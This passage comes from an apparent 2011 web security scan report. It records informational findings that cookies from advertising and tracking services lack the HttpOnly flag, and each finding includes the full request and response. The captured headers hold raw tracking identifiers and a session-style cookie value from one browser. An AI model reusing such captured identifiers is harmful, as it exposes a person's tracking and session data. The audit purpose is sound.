Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:03 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=166
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:03 GMT
Connection: close
Content-Length: 1996

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...

11.34. http://ds.addthis.com/red/psi/sites/www.fox8live.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.fox8live.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.fox8live.com/p.json?callback=_ate.ad.hpr&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.fox8live.com%2Fnews%2Flocal%2Fstory%2FSt-Bernard-prepares-for-rising-Mississippi-River%2FvJUO9a9n60iNAXZ6QCm2oQ.cspx&xp66c HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%7D..1304951889.1FE|1304951889.60; dt=X; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 186
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 09 May 2011 15:38:05 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 08 Jun 2011 15:38:05 GMT; Path=/
Set-Cookie: di=%7B%7D..1304951889.1FE|1304955485.1OD|1304951889.60; Domain=.addthis.com; Expires=Wed, 08-May-2013 15:38:02 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 09 May 2011 15:38:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 15:38:05 GMT
Connection: close

_ate.ad.hpr({"urls":["http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dab4fa85facd099"],"segments" : ["1OD"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

11.35. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=073b4702-bd65-4b9a-ba5b-edcd599ebdea HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 70
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260&10654=734265; domain=.interclick.com; expires=Sun, 09-May-2021 15:37:51 GMT; path=/
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 15:37:50 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;

11.36. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc4JnRsPTE1NzY4MDA=&piggybackCookie=uid:2724386019227846218 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; KADUSERCOOKIE=29E43D8F-52C5-4C7B-B2EA-0181496E6671; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:10 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889; domain=pubmatic.com; expires=Thu, 01-May-2014 17:54:49 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

11.37. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=media27_cs=1&betq=13111=435181 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=BUGCI3kAAAAAYm1CAEAA+DABAAAABAAAAIAA+DA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2uvWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAno2C+ORAgA1G!; C2=thAyN5pqDIxFGfkovMg3sYM7SKMCItdhrhQ3WX4aIsY4FuGCw3ghrhQ7NY4aIoLOGuGCKGehrhwmhX4aI8eDGuGCdDmhrhwohX4aIQY4FuGCYimhrhA3Wa4aIoa4FuGCA9qhrhgdeZ4aI4fFGuGCbTehrhwKOa4aIoN5FuGCC9qhrhwtZa4aIE0rGuGCFBqhrhQTaa4aIY4dGuGCNLqhrVrqDoxsGzetrSQIzaIGRGABg2cRBZm5IaAqxOCBsRpBZ0I9IsfzFA3i4SQBwWcSltCqGFFseSw7RaAWVSPBrLqxJNJUEQT2FgFruTQAzZAW0KHBbzqBYl6BE8sXGgFogRwrgYU3zWdBkoqxrM67FcNNGPWkAbwuRXETumvBEOpx5NLUGsEpGTIq+bQoeZwifOsBgwhhyW7/HUJtGBRZpTrRIFqFH09IGZUo8ew5qYASY6wBsMihlcAnjaYJHEv9FWSqGdQ9fZA1FirZDugRgELJI8GlGT0s2hA8kaAc; GUID=MTMwNDk1NDk4OTsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:36:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=3nAyN5pqDIxFGekovMg3sYI7SKMCItdRrhQ3WX0aIsY4FtGCw3gRrhQ7NY0aIoLOGtGCKGeRrhwmhX0aI8eDGtGCdDmRrhwohX0aIQY4FtGCYimRrhA3Wa0aIoa4FtGCA9qRrhgdeZ0aI4fFGtGCbTeRrhwKOa0aIoN5FtGCC9qRrhwtZa0aIE0rGtGCFBqRrhQTaa0aIY4dGtGCNLqRrVrqDoxsGyetrSQIzaEGRGABg2cBBZm5Ia8pxOCBsRpxY0I9IsfzF/2i4SQBwWYSltCqGEFseSw7Ra8VVSPBrLqhJNJUEQT2FfFruTQAzZ8V0KHBbzqxXl6BE8sXGfFogRwrgYQ3zWdBkoqhrM67FcNNGOWkAbwuRXATumvBEOph5NLUGsEpGSIq+bQoeZsifOsBgwhRyW7/HUJtGARZpTrBIFqFH09IGYUo8ew5qY8RY6wBsMiRlcAnjaUJHEv9FVSqGdQ9fZ80FirZDugBgELJI8GlGS0s2hA8ka8bzeDCtPqBwB; domain=advertising.com; expires=Wed, 08-May-2013 15:36:23 GMT; path=/
Set-Cookie: GUID=MTMwNDk1NTM4MzsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Wed, 08-May-2013 15:36:23 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 09 May 2011 16:36:23 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

11.38. http://map.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=6169&pcv=48&cb=8467213627&topHref=http%3A%2F%2Fwww.csmonitor.com%2FBusiness HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt11400gxzt1tr37xzt1tr37xzt11400gxzt113zye; adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh1443x0113l040k0450n; rdrlst=41y157rlklhm4000000083l04157olkxlm5000000033l0315holkxlm5000000033l0315sklkkpqq0000000g3l040m7alkkxrb0000000d3l040x1blkkpqq0000000g3l040hsplkkpqq0000000g3l040m7flkkyyl0000000b3l0412gdlkkyy00000000c3l04148ilkxlm5000000033l030morlkkxrb0000000d3l0414k6lkxlm5000000033l0314rwlkxlm5000000033l031196lkkkbe0000000m3l0414khlkxlm5000000033l031195lkkpqh0000000h3l041194lkkjj40000000n3l040dlxlkb5u20000000r3l0416nulkxlm5000000033l0314hplkxlm5000000033l030znmlk34620000000w3l0414hclkxlm5000000033l031193lkkplo0000000j3l041192lkkpke0000000l3l040p46lkkpqq0000000g3l04008slklhm4000000083l0416oilkxlm5000000033l030moylkl0r5000000093l040p1blkb5u20000000r3l0410tylkkpku0000000k3l0400bvlk9pe80000000s3l0415xylk60qe0000000v3l0410poljyxb40000000y3l040e6llkl0r5000000093l0410telkd7nq0000000q3l0416rslkxppm000000013l010c9slk9pe80000000s3l0410rdlkdkly0000000o3l040mj2lkkxrb0000000d3l0414qllkxlm5000000033l03159olk8fax0000000t3l0415halkxlm5000000033l030kualkkpqq0000000g3l04163plkxlm5000000033l030m0ulkl0r5000000093l040m45lkl0r5000000093l040m0plkkxrb0000000d3l040m40lkkxrb0000000d3l0416e6lkxnbq000000023l020mjelkkxrb0000000d3l0414xnlkxlm5000000033l0312qnlkkplt0000000i3l04167blkl0r5000000093l040bo8lkb5u20000000r3l040mjjlkl0r5000000093l041672lkkxrb0000000d3l040lw5lkb5u20000000r3l040ycrlkncow000000073l0415k9lkxlm5000000033l0316atlkxlm5000000033l031203lkb5u20000000r3l04163clkxlm5000000033l03137rlkkpqq0000000g3l041204lkkyy00000000c3l040o0vlkkpqx0000000f3l0414ozlkxlm5000000033l0314j7lkxlm5000000033l0314bzlkxlm5000000033l030z2ilkkxrb0000000d3l040ni1lkb5u20000000r3l04; sglst=2280sbpelkxlm5000000033l030k03503dsnlkxlm5000000033l030k03503arllkxlm5000000033l030k03503cg5lkxlm5000000033l030k035039rslkkpke0cw1r00l3l040k0450lam5lkkxr8002zw00e3l040k0450ecd4lkxlm5000000033l030k03503crglkxlm5000000033l030k03503cnolkxlm5000000033l030k03503abelkxlm5000000033l030k03503dd8lkxlm5000000033l030k03503cy2lkxlm5000000033l030k03503aoplkb5u209jqc0063e000j00500cnxlkxlm5000000033l030k03503bq3lkxlm5000000033l030k03503aoilkxlm5000000033l030k03503bvplkxlm5000000033l030k03503942lkb5u20mfs300o3l000k005009ullkxlm5000000033l030k035038ndlkb5u20mfs300o3l000k00500bvclkxlm5000000033l030k03503c5flkxlm5000000033l030k0350356blkb5u20mfs300o3l000k00500bjqlkxlm5000000033l030k03503awklkxlm5000000033l030k03503asulkb5u209jqc0063e000j00500crplkxlm5000000033l030k03503asqlkxlm5000000033l030k03503c5rlkov6e000000063l040k04506aw8lkxlm5000000033l030k03503c60lkxlm5000000033l030k03503dc4lkxlm5000000033l030k03503d26lkxlm5000000033l030k03503dnjlkxlm5000000033l030k03503brilkxlm5000000033l030k03503cbclkxlm5000000033l030k03503c85lkxlm5000000033l030k03503csslkxlm5000000033l030k03503c80lkb5u209jqc0063e000j00500ag2lkd7nq0ki1w00q3l040k0450nc1elkxlm5000000033l030k03503c81lkkpke0cw1r00i3l000k005009grlkxlm5000000033l030k03503c8flkxlm5000000033l030k03503a6slkkpke0cw1r00i3l000k00500dnalkxlm5000000033l030k035039z6lkxlm5000000033l030k03503dbtlkxlm5000000033l030k035039q4lkxlm5000000033l030k035030kllklhm40c4010053l000k00500dyllkxlm5000000033l030k03503b3zlkxlm5000000033l030k035039q5lkb5u20mfs300o3l000k005009mjlkxlm5000000033l030k03503dgflkkpke0cw1r00l3l040k0450l0t7ljyxb40ysei00y3l040k0450nbo0lkb5u20mfs300r3l040k0450nbo1lkkyy00cmo50093l000k005009pglkxlm5000000033l030k03503d86lklhm40c4010053l000k00500cwalkxlm5000000033l030k03503dqllkxlm5000000033l030k03503d84lkxlm5000000033l030k03503dz3lkxlm5000000033l030k03503cm6lkxlm5000000033l030k03503cxdlkxlm5000000033l030k03503719lkb5u20mfs30093l030k0350471alkkpke0cw1r00i3l000k00500ctplkxlm5000000033l030k03503cc3lkxlm5000000033l030k03503dgilkb5u209jqc0063e000j00500cthlkxlm5000000033l030k035034wclkb5u20mfs30093l030k03504a0ulkxlm5000000033l030k035035mrlkb5u20mfs300o3l000k005008eklkkpke0cw1r00i3l000k00500arilkxlm5000000033l030k03503cbplkxlm5000000033l030k03503bwjlkkyy00cmo500c3l040k0450c9gelkxlm5000000033l030k03503; vstcnt=417k010r154exp6103210e24tc6l103210e24ru4y1032107249v4u10pj10e22te10tq10a24tmhw103210924f69z103210f24pq44103210a24n86o103210d24eflo218e104203210724eyja103210e24na8i103210e24mqca103210e24nsyl103210f24jxig103210f24f9wk103210i24fvio218e20e20f203210f24uzpw118e10f24l16a118e10f24fz24103210924e8bw103210824fsuv103210924fduc218e10a203210e24uzdp103210b24dret103210724gqhl103210923sti21hj10a203210e2451gt10pj10e24styu103210924cnyl103210g24o2lt103210a24fj52103210924nnav103210f24m1v2103210a24f7qr218e108203210924uzg6218e100203210024fgv9218e108203210a24tfmw103210b23l4f103210a24kd6k103210c24hqyp103210i2

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 15:35:19 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh144d60123l050k0550o; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 15:35:19 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=41z157rlklhm4000000093l05157olkxlm5000000043l0415holkxlm5000000043l0415sklkkpqq0000000h3l050m7alkkxrb0000000e3l050x1blkkpqq0000000h3l050hsplkkpqq0000000h3l050m7flkkyyl0000000c3l0512gdlkkyy00000000d3l05148ilkxlm5000000043l040morlkkxrb0000000e3l0514k6lkxlm5000000043l0414rwlkxlm5000000043l0414khlkxlm5000000043l041196lkkkbe0000000n3l051195lkkpqh0000000i3l051194lkkjj40000000o3l050dlxlkb5u20000000s3l0516s2lkxpyv000000013l0114hplkxlm5000000043l0416nulkxlm5000000043l040znmlk34620000000x3l0514hclkxlm5000000043l041193lkkplo0000000k3l050p46lkkpqq0000000h3l051192lkkpke0000000m3l05008slklhm4000000093l0516oilkxlm5000000043l040moylkl0r50000000a3l050p1blkb5u20000000s3l0510tylkkpku0000000l3l0500bvlk9pe80000000t3l0515xylk60qe0000000w3l0510poljyxb40000000z3l050e6llkl0r50000000a3l0510telkd7nq0000000r3l0516rslkxppm000000023l020c9slk9pe80000000t3l0510rdlkdkly0000000p3l050mj2lkkxrb0000000e3l0514qllkxlm5000000043l04159olk8fax0000000u3l0515halkxlm5000000043l040kualkkpqq0000000h3l05163plkxlm5000000043l040m0ulkl0r50000000a3l050m45lkl0r50000000a3l050m0plkkxrb0000000e3l050m40lkkxrb0000000e3l0516e6lkxnbq000000033l030mjelkkxrb0000000e3l0512qnlkkplt0000000j3l0514xnlkxlm5000000043l04167blkl0r50000000a3l050bo8lkb5u20000000s3l050mjjlkl0r50000000a3l051672lkkxrb0000000e3l050lw5lkb5u20000000s3l050ycrlkncow000000083l0516atlkxlm5000000043l0415k9lkxlm5000000043l041203lkb5u20000000s3l051204lkkyy00000000d3l05137rlkkpqq0000000h3l05163clkxlm5000000043l040o0vlkkpqx0000000g3l0514ozlkxlm5000000043l0414j7lkxlm5000000043l0414bzlkxlm5000000043l040z2ilkkxrb0000000e3l050ni1lkb5u20000000s3l05; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 15:35:19 GMT; Path=/
Set-Cookie: sglst=2280sbpelkxlm5000000043l040k04504dsnlkxlm5000000043l040k04504arllkxlm5000000043l040k04504cg5lkxlm5000000043l040k045049rslkkpke0cw1r00m3l050k0550mam5lkkxr8002zw00f3l050k0550fcd4lkxlm5000000043l040k04504crglkxlm5000000043l040k04504cnolkxlm5000000043l040k04504abelkxlm5000000043l040k04504dd8lkxlm5000000043l040k04504cy2lkxlm5000000043l040k04504aoplkb5u209jqc0063e000j00500cnxlkxlm5000000043l040k04504bq3lkxlm5000000043l040k04504bvplkxlm5000000043l040k04504aoilkxlm5000000043l040k04504942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm5000000043l040k04504bvclkxlm5000000043l040k04504c5flkxlm5000000043l040k0450456blkb5u20mfs300o3l000k00500bjqlkxlm5000000043l040k04504awklkxlm5000000043l040k04504asulkb5u209jqc0063e000j00500crplkxlm5000000043l040k04504asqlkxlm5000000043l040k04504c5rlkov6e000000073l050k05507aw8lkxlm5000000043l040k04504c60lkxlm5000000043l040k04504dc4lkxlm5000000043l040k04504d26lkxlm5000000043l040k04504dnjlkxlm5000000043l040k04504brilkxlm5000000043l040k04504cbclkxlm5000000043l040k04504c85lkxlm5000000043l040k04504csslkxlm5000000043l040k04504c80lkb5u209jqc0063e000j00500ag2lkd7nq0kib500r3l050k0550oc1elkxlm5000000043l040k04504c81lkkpke0cw1r00i3l000k005009grlkxlm5000000043l040k04504c8flkxlm5000000043l040k04504a6slkkpke0cw1r00i3l000k00500dnalkxlm5000000043l040k045049z6lkxlm5000000043l040k04504dbtlkxlm5000000043l040k04504dyllkxlm5000000043l040k045040kllklhm40c4010053l000k005009q4lkxlm5000000043l040k045049q5lkb5u20mfs300o3l000k00500b3zlkxlm5000000043l040k045040t7ljyxb40ysnr00z3l050k0550odgflkkpke0cw1r00m3l050k0550m9mjlkxlm5000000043l040k04504bo0lkb5u20mfs300s3l050k0550obo1lkkyy00cmo50093l000k005009pglkxlm5000000043l040k04504cwalkxlm5000000043l040k04504d86lklhm40c4010053l000k00500d84lkxlm5000000043l040k04504dqllkxlm5000000043l040k04504dz3lkxlm5000000043l040k04504cm6lkxlm5000000043l040k04504cxdlkxlm5000000043l040k04504719lkb5u20mfs300a3l040k0450571alkkpke0cw1r00i3l000k00500ctplkxlm5000000043l040k04504cc3lkxlm5000000043l040k04504dgilkb5u209jqc0063e000j00500cthlkxlm5000000043l040k045044wclkb5u20mfs300a3l040k045058eklkkpke0cw1r00i3l000k005005mrlkb5u20mfs300o3l000k00500a0ulkxlm5000000043l040k04504arilkxlm5000000043l040k04504bwjlkkyy00cmo500d3l050k0550dcbplkxlm5000000043l040k045049gelkxlm5000000043l040k04504; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 15:35:19 GMT; Path=/
Set-Cookie: vstcnt=417k010r154exp6103210e24tc6l103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24tmhw103210924n86o103210d24pq44103210a24eflo218e104203210724na8i103210e24eyja103210e24mqca103210e24nsyl103210f24jxig103210f24f9wk103210i24fvio218e20e20f203210f24uzpw118e10f24l16a118e10f24fz24103210924e8bw103210824fsuv103210924fduc218e10a203210e24uzdp103210b24dret103210724gqhl103210923sti21hj10a203210e24cnyl103210g24styu10321092451gt10pj10e24fj52103210924o2lt103210a24nnav103210f24m1v2103210a24f7qr218e108203210924uzg6218e100203210024fgv9218e108203210a24tfmw103210b24hqyp103210i24kd6k103210c23l4f103210a2; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 15:35:19 GMT; Path=/
Location: http://www.googleadservices.com/pagead/conversion/1030881291/?label=l3pmCL-AvwIQi4DI6wM&amp;guid=ON&amp;script=0
Content-Length: 0
Date: Mon, 09 May 2011 15:35:19 GMT


11.39. http://odb.outbrain.com/utils/get  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&settings=true&recs=true&widgetJSId=NA&key=AYQHSUWJ8576&idx=0&version=37740&ref=&apv=false&rand=0.4678053397219628&sig=li HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tick=1304954969218; _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Thu, 03-May-2012 15:36:56 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1304955416503; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 15:36:56 GMT; Path=/
Set-Cookie: _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; Domain=outbrain.com; Expires=Mon, 16-May-2011 04:24:56 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 15:36:56 GMT; Path=/
Set-Cookie: recs-d70c1e5d44de8a9150eb91ecff563578="yoz9obW/2XhfIb4e31QLF+S7Xa4bySS399HA3bzA01t8TBqoY5+CsuLi96Cxd+UejaFla9pteKU="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 09-May-2011 15:41:56 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:56 GMT
Content-Length: 5444

outbrain_rater.returnedOdbData({'response':{'exec_time':17,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'203024277','req_id':'ee2d80d8f79db75191b6df986070973c'},'score':{'preferred
...[SNIP]...

11.40. http://odb.outbrain.com/utils/get  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

